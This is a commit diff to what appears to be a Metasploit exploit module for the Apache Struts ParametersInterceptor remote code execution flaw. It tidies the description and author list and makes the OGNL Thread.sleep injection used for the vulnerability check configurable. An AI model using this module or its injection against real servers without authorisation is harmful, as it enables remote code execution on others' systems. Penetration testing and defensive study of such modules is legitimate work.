cleanup for struts_code_exec_parameters

Author: jvazquez-r7

modules/exploits/multi/http/struts_code_exec_parameters.rb

@@ -18,18 +18,18 @@ def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'Apache Struts ParametersInterceptor Remote Code Execution',
 			'Description'    => %q{
-				This module exploits a remote command execution vulnerability in
-				Apache Struts versions < 2.3.1.2. This issue is caused because the
-				ParametersInterceptor allows for the use of parentheses which in turn allows it to interpret
-				parameter values as OGNL expressions during certain exception handling for mismatched
-				data types of properties which allows remote attackers to execute arbitrary Java code
-				via a crafted parameter.
+				This module exploits a remote command execution vulnerability in Apache Struts
+				versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
+				for the use of parentheses which in turn allows it to interpret parameter values as
+				OGNL expressions during certain exception handling for mismatched data types of
+				properties which allows remote attackers to execute arbitrary Java code via a
+				crafted parameter.
 			},
 			'Author'         =>
 				[
-					'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
 					'Meder Kydyraliev', # Vulnerability Discovery and PoC
-					'mihi', #ARCH_JAVA support
+					'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
+					'mihi' #ARCH_JAVA support
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -57,8 +57,8 @@ def initialize(info = {})
 					],
 					[ 'Java Universal',
 						{
-								'Arch' => ARCH_JAVA,
-								'Platform' => 'java'
+							'Arch' => ARCH_JAVA,
+							'Platform' => 'java'
 						},
 					]
 				],
@@ -69,8 +69,9 @@ def initialize(info = {})
 				[
 					Opt::RPORT(8080),
 					OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
-					OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"])
-				], self.class)
+					OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
+					OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
+		], self.class)
 	end
 
 	def execute_command(cmd, opts = {})
@@ -144,17 +145,18 @@ def java_upload_part(part, filename, append = 'false')
 	end
 
 	def check
-		check_cmd = "@java.lang.Thread@sleep(10000)"
+		sleep_time = datastore['CHECK_SLEEPTIME']
+		check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
 		t1 = Time.now
-		print_status("Asking remote server to sleep for 10 seconds")
+		print_status("Asking remote server to sleep for #{sleep_time} seconds")
 		response = execute_command(check_cmd)
 		t2 = Time.now
 		delta = t2 - t1
 
 
 		if response.nil?
 			return Exploit::CheckCode::Safe
-		elsif delta < 10
+		elsif delta < sleep_time
 			return Exploit::CheckCode::Safe
 		else
 			return Exploit::CheckCode::Appears